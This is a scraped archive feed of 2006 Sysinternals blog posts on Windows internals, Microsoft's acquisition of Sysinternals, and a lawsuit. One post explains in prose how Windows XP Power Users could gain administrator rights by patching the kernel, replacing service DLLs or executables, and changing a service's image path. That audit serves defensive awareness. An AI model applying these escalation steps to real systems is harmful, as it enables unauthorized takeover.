/> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Windows Defender’s service performs real-time checks and then the process launches </DIV> </LI> </OL> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> A little more research led me to conclude that the delay happens only under very specific circumstances: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <UL style="MARGIN-TOP: 0in" type="disc"> <BR /> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> The system is running Windows XP 64-bit for x64 or Windows Server 2003 SP1 <BR /> </LI> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> Windows Defender Beta 2 is active <BR /> </LI> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> The system is domain-joined, but has not connected to the domain in the current boot session </LI> </UL> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> 32-bit Windows XP doesn’t perform the SID mapping in OpenLpcPort and Windows Defender doesn’t use a shell execute hook on Windows Vista. The Windows Defender team is looking at workarounds for the next release, but now that I understand the delay I can work around it. 
</P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:53 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-process-startup-delays/ba-p/723526 MarkRussinovich 2019-06-27T06:28:53Z My Blog Has Moved https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/my-blog-has-moved/ba-p/723525 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 31, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> <P> My blog has moved to its <A href="#" mce_href="#" target="_blank"> new home </A> at Microsoft TechNet blogs where you'll find my current post, The Case of the Process Startup Delays. <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 8/31/2006 11:55:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </DIV> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/my-blog-has-moved/ba-p/723525 TechCommunityAPIAdmin 2019-06-27T06:28:37Z The First Week https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-first-week/ba-p/723524 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 31, 2006 </STRONG> <BR /> <P> First I want to thank the many people who have sent me warm wishes on my move to Microsoft, both directly and via comments on my last blog post. I didn’t make it clear, but both Bryce and I have relocated to Microsoft’s Redmond campus and I’ve just finished my first week as a Microsoft employee. <BR /> <BR /> The week started with a day and a half of New Employee Orientation (NEO), which Bryce and I attended with 180 or so other new hires. The attendees included people from all over the US and the world, including the Netherlands, Germany, China, and India. All of Microsoft’s groups, such as legal, finance, and of course development, were represented, as were all levels in the organizational hierarchy. 
<BR /> <BR /> NEO starts with an overview of Microsoft’s mission statement (to help people reach their full potential) and an introduction to Microsoft’s various divisions and senior leaders. The second part of day one concentrates on human relations (HR) topics like employee diversity and interest groups, payroll and benefits. The morning of day two is entirely occupied with legal information, like the importance of security, definitions of patents, copyright, trademark, and trade secrets. <BR /> <BR /> The amount of factual information delivered could probably fit in a two-hour presentation, but there is a heavy emphasis on Microsoft’s culture threaded through every module. I was impressed by the conveyed importance of diversity, Microsoft’s encouragement on giving to the community through matching contributions, and most surprisingly, the effort to cooperate with customers and partners and to promote a positive image of Microsoft both locally and globally. Nevertheless, I was familiar with much of the information through my many interactions with Microsoft throughout the last 10 years and so was a bit bored. <BR /> <BR /> With NEO behind me I spent the rest of the week meeting with many different people in the core operating systems division (COSD) and attending various meetings. For the near future I’ll be working with the client performance team analyzing and addressing Vista performance issues. While features such as <A href="#" mce_href="#" target="_blank"> Superfetch </A> , a scenario-based memory management system, and I/O prioritization help to improve the performance of the operating system from an end-user perspective, the addition of constant search indexing, the side bar with its gadgets, the defragmenter, and regular volume snapshots all conspire to erode their gains. 
<BR /> <BR /> Comprehensive performance instrumentation of everything from disk I/Os to context switches and hard page faults is active on all Vista builds deployed internally, and end users can simply open a desktop shortcut to submit a trace of any sluggish system behavior they experience. The team’s job is to determine the cause of the behavior and make recommendations to other teams for improving their design or avoiding multi-component interactions that lead to pathological situations. <BR /> <BR /> The performance team consists of some amazingly talented people and the tools they’ve developed internally for visualizing and exploring the trace data provide a powerful view into the minutest details of the system’s operation. I’m having fun using them to look at what happens when I do something as simple as open the start menu and I hope to show them in an upcoming blog post. <BR /> <BR /> One of the most frustrating aspects of the first week is that I still have no working Microsoft email account. For apparently legal reasons Microsoft doesn’t create an email account until the first day of employment, and after that everyone is resigned to the fact that “it takes a while for information to propagate through the system”. In my case, I didn’t fill out a form on the first day because I didn’t have two forms of ID with me, and I didn’t realize that it would hold up a bunch of things. Once I found out on Wednesday that it was holding things up, I got it turned in, and it looks like things are moving, so I’m hopeful that the email will start working. I just wonder if all the emails that people have sent to the account will be sitting there waiting for me when I access it. <BR /> <BR /> Probably most important, however, is the outcome of the various meetings I’ve had with the Sysinternals/Winternals integration team. 
I’m pleased to report that Microsoft’s number one priority is not only keeping the tools freely available, but preserving the Sysinternals community including the newsletter, the forums, and my blog. While we’re still brainstorming how to make this successful in the long term, I’m pleased to announce the first step in the transition, which is the introduction of a new <A href="#" mce_href="#" target="_blank"> Sysinternals EULA </A> , that I believe is even more permissive than the EULA in place before the Microsoft acquisition, since it allows for wider use of Sysinternals utilities within a company. <BR /> <BR /> In the near future, the next step will probably be to move the tools to the Microsoft download center, which will increase download capacity. (No, they won’t be wrapped in .MSI files). I, and Microsoft, believe that this also demonstrates Microsoft’s commitment to keep the tools freely available. I’ll keep you posted as the rest of the transition plan unfolds, but rest assured that Sysinternals, though it might end up looking different, is here to stay. <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 7/31/2006 10:33:00 PM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:33 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-first-week/ba-p/723524 TechCommunityAPIAdmin 2019-06-27T06:28:33Z On My Way to Microsoft! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/on-my-way-to-microsoft/ba-p/723523 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 18, 2006 </STRONG> <BR /> <P> I’m very pleased to announce that <A href="#" mce_href="#" target="_blank"> Microsoft has acquired Winternals Software </A> and Sysinternals. 
Bryce Cogswell and I founded both Winternals and Sysinternals (originally NTInternals) back in 1996 with the goal of developing advanced technologies for Windows. We’ve had an incredible amount of fun over the last ten years working on a wide range of diverse products such as Winternals Administrator’s Pak, Protection Manager, Defrag Manager, and Recovery Manager, and the dozens of Sysinternals tools, including Filemon, Regmon and Process Explorer, that millions of people use every day for systems troubleshooting and management. There’s nothing more satisfying for me than to see our ideas and their implementation have a positive impact. <BR /> <BR /> That’s what makes being acquired by Microsoft especially exciting and rewarding. I’m joining Microsoft as a technical fellow in the Platform and Services Division, which is the division that includes the Core Operating Systems Division, Windows Client and Windows Live, and Windows Server and Tools. I’ll therefore be working on challenging projects that span the entire Windows product line and directly influence subsequent generations of the most important operating system on the planet. From security to virtualization to performance to a more manageable application model, there’s no end of interesting areas to explore and innovate. <BR /> <BR /> So what’s going to happen to Winternals and Sysinternals? Microsoft is still evaluating the best way to leverage the many different technologies that have been developed by Winternals. Some will find their ways into existing Microsoft products or Windows itself and others will continue on as Microsoft-branded products. As for Sysinternals, the site will remain for the time being while Microsoft determines the best way to integrate it into its own community efforts, and the tools will continue to be free to download. 
<BR /> <BR /> Personally, I remain committed to the Sysinternals and Windows IT pro communities and so I’ll continue to blog here, to write about Windows technologies, and to speak at conferences. Until I know my Microsoft email address and post it you can continue to contact me at <A href="https://gorovian.000webhostapp.com/?exam=mailto:mark@sysinternals.com" mce_href="https://gorovian.000webhostapp.com/?exam=mailto:mark@sysinternals.com" target="_blank"> mark@sysinternals.com </A> . <BR /> <BR /> I’m looking forward to making Windows an even better platform for all of us! <BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 7/18/2006 10:20:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:28 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/on-my-way-to-microsoft/ba-p/723523 TechCommunityAPIAdmin 2019-06-27T06:28:28Z The Power in Power Users https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-power-in-power-users/ba-p/723522 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 01, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> </DIV> Placing Windows user accounts in the Power Users security group is a common approach IT organizations take to get users into a least-privilege environment while avoiding the many pains of truly running as a limited user. The <A href="#" mce_href="#" target="_blank"> Power Users group </A> is able to install software, manage power and time-zone settings, and install ActiveX controls, actions that limited Users are denied. <BR /> <BR /> What many administrators fail to realize, however, is that this power comes at the price of true limited-user security. 
Many articles, including this Microsoft Knowledge Base <A href="#" mce_href="#" target="_blank"> article </A> and this <A href="#" mce_href="#" target="_blank"> blog post </A> by Microsoft security specialist Jesper Johansson, point out that a user who belongs to the Power Users group can easily elevate to a fully privileged administrator, but I was unable to find a detailed description of the elevation mechanisms they refer to. I therefore decided to investigate. <BR /> <BR /> Before I could start the investigation, I had to define the problem. In the absence of a security flaw such as a buffer overflow, privilege escalation is possible only if an account can configure arbitrary code to execute in the context of a more-privileged account. The default accounts that have more privilege than Power Users include Administrators and the Local System account, in which several Windows service processes run. Thus, if a Power Users member can modify a file executed by one of these accounts, configure one of their executables to load an arbitrary DLL, or add an executable auto-start to these accounts, they can obtain full administrative privileges. <BR /> <BR /> My first step was to see which files and directories the Power Users group has write access to, but limited users do not. The systems I considered were stock Windows 2000 Professional SP4, Windows XP SP2, and Windows Vista. I'm not going to bother looking at server systems because the most common Power Users scenario is on a workstation. <BR /> <BR /> The brute force method of seeing what file system objects Power Users can modify requires visiting each file and directory and examining its permissions, something that’s clearly not practical. The command-line Cacls utility that Windows includes dumps security descriptors, but I’ve never bothered learning Security Descriptor Definition Language (SDDL) and parsing the output would require writing a script. 
The <A href="#" mce_href="#" target="_blank"> AccessEnum </A> utility that Bryce wrote seemed promising and it can also look at Registry security, but it’s aimed at showing potential permissions weaknesses, not the accesses available to particular accounts. Further, I knew that I’d also need to examine the security applied to Windows services. <BR /> <BR /> I concluded that I had to write a new utility for the job, so I created <A href="#" mce_href="#" target="_blank"> AccessChk </A> . You pass AccessChk an account or group name and a file system path, Registry key, or Windows service name, and it reports the effective accesses the account or group has for the object, taking into consideration the account’s group memberships. For example, if the Mark account had access to a file, but Mark belongs to the Developers group that is explicitly denied access, then AccessChk would show Mark as having no access. <BR /> <BR /> In order to make the output easy to read AccessChk prints ‘W’ next to the object name if an account has any permissions that would allow it to modify an object, and ‘R’ if an account can read the object’s data or status. Various switches cause AccessChk to recurse into subdirectories or Registry subkeys and the -v switch has it report the specific accesses available to the account. A switch I added specifically to seek out objects for which an account has write access is -w. <BR /> <BR /> Armed with this new tool I was ready to start investigating. My first target was a Windows XP SP2 VMWare installation that has no installed applications other than the VMWare Tools. The first command I executed was: <BR /> <BR /> <SPAN style="FONT-FAMILY: courier new"> accesschk -ws "power users" c:\windows </SPAN> <BR /> <BR /> This shows all the files and directories under the \Windows directory that the Power Users group can modify. 
Of course, many of the files under \Windows are part of the operating system or Windows services and therefore execute in the Local System account. AccessChk reported that Power Users can modify most of the directories under \Windows, which allows member users to create files in those directories. Thus, a member of the Power Users group can create files in the \Windows and \Windows\System32 directory, which is a common requirement of poorly written legacy applications. In addition, Power Users needs to be able to create files in the \Windows\Downloaded Program Files directory so that they can install ActiveX controls, since Internet Explorer saves them to that directory. However, simply creating a file in these directories is not a path to privilege elevation. <BR /> <BR /> Despite the fact that Power Users can create files underneath \Windows and most of its subdirectories, Windows configures default security permissions on most files contained in these directories so that only members of the Administrators group and the Local System account have write access. Exceptions include the font files (.fon), many system log files (.log), some help files (.chm), pictures and audio clips (.jpg, .gif, and .wmv) and installation files (.inf), but none of these files can be modified or replaced to gain administrative privilege. The device drivers in \Windows\System32\Drivers would allow easy escalation, but Power Users doesn’t have write access to any of them. <BR /> <BR /> I did see a number of .exe’s and .dll’s in the list, though, so I examined them for possible exploits. Most of the executables for which Power Users has write access are interactive utilities or run with reduced privileges. Unless you can trick an administrator into logging into the system interactively, these can’t be used to elevate. 
But there’s one glaring exception: ntoskrnl.exe: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482398/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482398/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120937i7825F7116341EAF4" /> <BR /> <BR /> That’s right, Power Users can replace or modify Windows’ core operating system file. Five seconds after the file is modified, however, Windows File Protection (WFP) will replace it with a backup copy it retrieves, in most cases, from \Windows\System32\Dllcache. Power Users doesn’t have write access to files in Dllcache so it can’t subvert the backup copy. But members of the Power Users group can circumvent WFP by writing a simple program that replaces the file, flushes the modified data to disk, then reboots the system before WFP takes action. <BR /> <BR /> I verified that this approach works, but the question remained of how this vulnerability can be used to elevate privilege. The answer is as easy as using a disassembler to find the function that Windows uses for privilege checks, <A href="#" mce_href="#" target="_blank"> SeSinglePrivilegeCheck </A> , and patching its entry point in the on-disk image so that it always returns TRUE, which is the result code that indicates that a user has the privilege being checked for. Once a user is running on a kernel modified in this manner they will appear to have all privileges, including Load Driver, Take Ownership, and Create Token, to name just a few of the privileges that they can easily leverage to take full administrative control of a system. Although 64-bit Windows XP prevents kernel tampering with <A href="#" mce_href="#" target="_blank"> PatchGuard </A> , few enterprises are running on 64-bit Windows. 
<BR /> <BR /> Replacing Ntoskrnl.exe isn’t the only way to punch through to administrative privilege via the \Windows directory, however. At least one of the DLLs for which default permissions allow modification by Power Users, Schedsvc.dll, runs as a Windows service in the Local System account. Schedsvc.dll is the DLL that implements the Windows Task Scheduler service. Windows can operate successfully without the service, so Power Users can replace the DLL with an arbitrary DLL, such as one that simply adds their account to the Local Administrators group. Of course, WFP protects this file as well, so replacing it requires the use of the WFP-bypass technique I’ve described. <BR /> <BR /> I’d already identified several elevation vectors, but continued my investigation by looking at Power Users access to the \Program Files directory, where I found default permissions similar to those in the \Windows directory. Power Users can create subdirectories under \Program Files, but can’t modify most of the preinstalled Windows components. Again, the exceptions, like Windows Messenger (\Program Files\Messenger\Msmsgs.exe) and Windows Media Player (\Program Files\Windows Media Player\Wmplayer.exe), run interactively. <BR /> <BR /> That doesn’t mean that \Program Files doesn’t have potential holes. When I examined the most recent output I saw that Power Users can modify any file or directory created in \Program Files subsequent to those created during the base Windows install. On my test system \Program Files\Vmware\Vmware Tools\Vmwareservice.exe, the image file for the Vmware Windows service that runs in the Local System account, was such a file. Another somewhat ironic example is Microsoft Windows Defender Beta 2, which installs its service executable in \Program Files\Windows Defender with default security settings. 
Replacing these service image files is a quick path to administrator privilege and is even easier than replacing files in the \Windows directory because WFP doesn’t meddle with replacements. <BR /> <BR /> Next I turned my attention to the Registry by running this command: <BR /> <BR /> <SPAN style="FONT-FAMILY: courier new"> accesschk -swk "power users" hklm </SPAN> <BR /> <BR /> The output list was enormous because Power Users has write access to the vast majority of the HKLM\Software key. The first area I studied for possible elevations was the HKLM\System key, because write access to many settings beneath it, such as the Windows service and driver configuration keys in HKLM\System\CurrentControlSet\Services, would permit trivial subversion of the Local System account. The analysis revealed that Power Users doesn’t have write access to anything significant under that key. <BR /> <BR /> Most of the Power Users-writeable areas under the other major branch of HKLM, Software, related to Internet Explorer, Explorer and its file associations, and power management configuration. Power Users also has write access to HKLM\Software\Microsoft\Windows\CurrentVersion\Run, allowing them to configure arbitrary executables to run whenever someone logs on interactively, but exploiting this requires a user with administrative privilege to log onto the system interactively (which, depending on the system, may never happen, or happen infrequently). And just as for the \Program Files directory, Power Users has default write access to non-Windows subkeys of HKLM\Software, meaning that third-party applications that configure executable code paths in their system-wide Registry keys could open security holes. VMWare, the only application installed on the system, did not. <BR /> <BR /> The remaining area of exploration was Windows services. The only service permissions AccessChk considers to be write accesses are SERVICE_CHANGE_CONFIG and WRITE_DAC. 
A user with SERVICE_CHANGE_CONFIG can configure an arbitrary executable to launch when a service starts and given WRITE_DAC they can modify the permissions on a service to grant themselves SERVICE_CHANGE_CONFIG access. AccessChk revealed the following on my stock Windows XP SP2 system: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482399/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482399/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120938i2BA655596A084A53" /> <BR /> <BR /> I next ran <A href="#" mce_href="#" target="_blank"> PsService </A> to see the account in which the DcomLaunch service executes: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482400/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482400/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120939i63A1C3818C29AA76" /> <BR /> <BR /> Thus, members of the Power Users group can simply change the image path of DComLauncher to point at their own image, reboot the system, and enjoy administrative privileges. <BR /> <BR /> There can potentially be other services that introduce exploits in their security. The default permissions Windows sets on services created by third-party applications do not allow Power Users write access, but some third party applications might configure custom permissions to allow them to do so. 
In fact, on my production 64-bit Windows XP installation AccessChk reveals a hole that not only Power Users can use to elevate themselves, but that limited users can as well: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482401/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482401/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120940i0564C9B104B7018A" /> <BR /> <BR /> I’d now finished the major phase of my investigation and just confirmed what everyone has been saying: a determined member of the Power Users group can fairly easily make themselves full administrator using exploits in the operating system and ones created by third-party applications. <BR /> <BR /> My final step was to see how Microsoft’s approach to the Power Users account has evolved over time. This 1999 Microsoft Knowledge Base <A href="#" mce_href="#" target="_blank"> article </A> documents the famous screen-saver elevation vulnerability that existed on Windows NT 4, but Microsoft closed that hole before the release of Windows 2000. The KB article also shows that Microsoft was apparently unaware of other vulnerabilities that likely existed. Windows 2000 SP4 also includes holes, but is actually slightly more secure than the default Windows XP SP2 configuration: Power Users don’t have write access to Ntoskrnl.exe or the Task Scheduler image file, but instead of write-access to the DComLauncher service they can subvert the WMI service, which also runs in the Local System account. <BR /> <BR /> Windows XP SP1 added more Power Users weaknesses, including write access to critical system files like Svchost.exe, the Windows service hosting process, and additional services, WMI and SSDPSRV, with exploitable permissions. 
Several services even allowed limited users to elevate as described in this Microsoft KB <A href="#" mce_href="#" target="_blank"> article </A> from March of this year. <BR /> <BR /> Microsoft’s newest operating system, Windows Vista, closes down all the vulnerabilities I’ve described by neutering Power Users so that it behaves identically to limited Users. Microsoft has thus closed the door on Power Users in order to force IT staffs into securing their systems by moving users into limited Users accounts or into administrative accounts where they must acknowledge end-user control over their systems. <BR /> <BR /> The bottom line is that while Microsoft could fix the vulnerabilities I found in my investigation, they can’t prevent third-party applications from introducing new ones while at the same time preserving the ability of Power Users to install applications and ActiveX controls. The lesson is that as an IT administrator you shouldn’t fool yourself into thinking that the Power Users group is a secure compromise on the way to running as limited user. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 5/1/2006 11:01:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:24 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-power-in-power-users/ba-p/723522 TechCommunityAPIAdmin 2019-06-27T06:28:24Z Why Winternals Sued Best Buy https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/why-winternals-sued-best-buy/ba-p/723517 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 21, 2006 </STRONG> <BR /> <P> This post I’m taking a break from my standard technical postings to discuss a disturbing discovery regarding a large corporation’s unauthorized software usage. 
By now many of you have heard via <A href="#" mce_href="#" target="_blank"> Slashdot </A> , <A href="#" mce_href="#" target="_blank"> arstechnica </A> , <A href="#" mce_href="#" target="_blank"> Digg </A> , or your local newspaper that <A href="#" mce_href="#" target="_blank"> Winternals Software </A> , the company I co-founded with Bryce Cogswell in 1996, <A href="#" mce_href="#" target="_blank"> filed suit </A> in Federal court against Geek Squad and Best Buy for illegal use of the Administrator’s Pak. What the press coverage to date might not have made clear is what Geek Squad and Best Buy did prior to approaching Winternals in October 2005 about a license to our software, what they continued to do after terminating licensing discussions in February 2006, and why we felt we had no alternative but to protect our software through the legal system. This is the first lawsuit Winternals has ever initiated, and we did not approach the decision lightly. <BR /> <BR /> Best Buy acquired the Geek Squad several years ago and has grown the unit to a size of approximately 12,000 employees that analysts estimate will generate over a billion dollars of revenue this year alone. The Geek Squad provides system repair, data salvaging, and installation services in each of the Best Buy retail outlets and, for an additional significant fee, a 911 service that travels to customer homes to perform repairs on site. <BR /> <BR /> The <A href="#" mce_href="#" target="_blank"> Administrator’s Pak </A> is a collection of powerful system utilities, including enhanced versions of Sysinternals Filemon and Regmon that work remotely and have log-to-file capability, that’s sold to individual systems administrators. 
The flagship tool is ERD Commander, a <A href="#" mce_href="#" target="_blank"> Windows Preinstallation Environment </A> (WinPE)-based recovery environment with a familiar Windows user-interface that is the latest generation of the original ERD Commander product we released in 1998 and upon which Winternals was built. While Windows includes a rudimentary unbootable system repair tool in the form of the Recovery Console, Microsoft has chosen not to provide an advanced unbootable system repair, diagnosis and recovery environment on par with ERD Commander. The BartPE freeware alternative that clones WinPE offers some of the same functionality as ERD Commander, but is missing key features such as the System Restore Wizard, hotfix and Service Pack uninstaller, password changer, crash analyzer wizard, and integrated Registry editor. <BR /> <BR /> As outlined in our Complaint and Motion for Temporary Restraining Order (which can be found, along with all other legal documents filed in the case, at <A href="#" mce_href="#" target="_blank"> http://www.winternals.com/legal/ </A> ), Best Buy and Geek Squad initially contacted us and said that a license was needed to come into compliance. Rather than focus on the degree to which Best Buy and Geek Squad had previously engaged in the unauthorized copying and use of our products, we entered negotiations for a software license and to establish a long-term business relationship. To educate their employees on the software and facilitate these negotiations, we even held a training session at our expense on the Administrator's Pak at their facilities in Minneapolis and offered an eminently reasonable software license for all Geek Squad employees. While surprised that they ultimately decided against a license, we were willing to go our separate ways with the hope that they would someday change their minds. 
<BR /> <BR /> However, after receiving information that Geek Squad employees continued to use ERD Commander frequently in repairing customers' computers we decided to investigate the situation on our own. The level of unauthorized copying and usage we’ve uncovered in our preliminary investigation is substantial and has apparently taken place over several years. Our evidence includes admissions by highly-placed current Geek Squad and Best Buy employees and interviews of many former employees. As alleged in the Complaint, we also found that Geek Squad employees across the country were still using unlicensed copies of our software to repair computers. <BR /> <BR /> In the end we concluded that the only remaining option was to take legal action. Winternals has invested substantial time and capital in developing this software and believes that Geek Squad should not be permitted to allow its 12,000 employees to use unlicensed copies for free while generating substantial profits from those efforts. Our <A href="#" mce_href="#" target="_blank"> press release </A> provides a summary of the lawsuit and the court's action to date. 
<BR /> </P> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 4/21/2006 9:28:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:52 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/why-winternals-sued-best-buy/ba-p/723517 TechCommunityAPIAdmin 2019-06-27T06:27:52Z The Case of the Mysterious Driver https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-driver/ba-p/723516 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 27, 2006 </STRONG> <BR /> <DIV style="CLEAR: both"> </DIV> The other day I used <A href="#" mce_href="#" target="_blank"> Process Explorer </A> to examine the drivers loaded on a home system to see if I’d picked up any Sony or <A href="#" mce_href="#" target="_blank"> Starforce </A> -like digital rights management (DRM) device drivers. The DLL view of the System process, which reports the currently loaded drivers and kernel-mode modules (such as the Hardware Abstraction Layer – HAL), listed mostly Microsoft operating system drivers and drivers associated with the DVD burning software I have installed, but one entry, Asctrm.sys caught my attention because its company information is “Windows (R) 2000 DDK provider”: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482390/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482390/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120934iB76FBD6D806CFBDC" /> <BR /> <BR /> This is the company name included in the version information of drivers that have been based on sample code from the Windows 2000 Device Driver Kit (DDK) and it’s obviously unusual to see it in production images. 
The driver’s description is equally unenlightening: “TR Manager”. My suspicions aroused, I set about investigating. <BR /> <BR /> My first step was to right-click on the entry and “Google” the driver image name. The resulting <A href="#" mce_href="#" target="_blank"> Google search </A> reveals that others have this driver and that in some cases it had been identified as the cause of system crashes, but although several spyware databases have entries for it, none of the ones I checked conclusively tied the driver to an application or vendor. <BR /> <BR /> I next looked for clues in the image itself by double-clicking on the driver entry in the DLL view to open the Process Explorer DLL properties dialog. The image page revealed nothing of interest other than the fact that the driver had been linked in December of 2004. I turned my attention to the Strings tab to look for some hint as to the driver’s reason for existence. None of the few intelligible strings Process Explorer found in the image were unique except for the last one: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482391/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482391/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120935i6ADA9FA750F62DD1" /> <BR /> <BR /> When a driver is compiled, the linker stores in the image the path to the debug information file it generates, which has the extension .pdb. The path in this case appears to include the name of a company, “AegiSoft”. However, the <A href="#" mce_href="#" target="_blank"> http://www.aegisoft.com/ </A> web site describes Aegis Software, Inc. 
as a company that creates “powerful, sophisticated and easy to use trading software and services for financial companies that demand performance, robustness, availability, and flexibility.” That doesn’t sound like a company that ships device drivers. <BR /> <BR /> On a whim I did a Google search of “aegis” and came across <A href="#" mce_href="#" target="_blank"> this January 2001 news item </A> announcing RealNetworks’ acquisition of Aegisoft Corp. (notice the difference in name from Aegis Software, Inc.). I knew I had RealPlayer installed on the system so I ran RealPlayer and confirmed that it uses the driver by doing a handle search for “asctrm”, the name of the device object I had seen in one of the driver’s strings: <BR /> <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482392/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482392/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120936iF36D01EB1F096AB7" /> <BR /> <BR /> Newer versions of RealPlayer don’t appear to include a device driver, but I have an old version on this system. I haven't gotten new release notifications because after installing RealPlayer I always use Autoruns to delete the HKLM\Software\Microsoft\Windows\CurrentVersion\Run item that the RealPlayer setup creates to launch the Real Networks Scheduler at each boot. That Run entry, incidentally, is “TkBellExe”, another misleading label. <BR /> <BR /> So the driver is not malicious after all (but is related to DRM, so agreement with that view depends on your feelings about DRM), however this example highlights the need for all software vendors (Microsoft included!) to clearly identify their applications and drivers in their version resources and in any associated Registry keys or values. 
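<BR /> <BR /> The .pdb path that gave this driver away can also be pulled out of an image with a few lines of script. What follows is only a rough sketch of the idea behind the Strings tab, not how Process Explorer implements it: the function name find_pdb_paths, the min_len parameter, and the sample bytes (including the build path) are all made up for illustration, and a proper tool would parse the image's debug directory instead of scanning for printable text.

```python
import re


def find_pdb_paths(image_bytes, min_len=6):
    """Return printable ASCII strings in image_bytes that end in '.pdb'."""
    # A "string" here is a run of at least min_len printable ASCII bytes.
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    paths = []
    for match in pattern.finditer(image_bytes):
        text = match.group().decode("ascii")
        if text.lower().endswith(".pdb"):
            paths.append(text)
    return paths


# Hypothetical stand-in for a driver image: a few header bytes, a device
# name string, and a NUL-terminated debug path (all invented for the example).
sample_image = (
    b"MZ\x90\x00"
    + b"\\Device\\Example\x00"
    + b"\x01\x00\x00\x00"
    + b"c:\\build\\example\\objfre\\i386\\example.pdb\x00"
)

pdb_paths = find_pdb_paths(sample_image)
print(pdb_paths)
```

To try it on a real file, read the driver with open(path, "rb").read() and pass the bytes in. Because the scan is purely textual, printable bytes that happen to sit directly in front of the path would be glued onto it, which is one reason to treat the output as a hint rather than a definitive answer.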
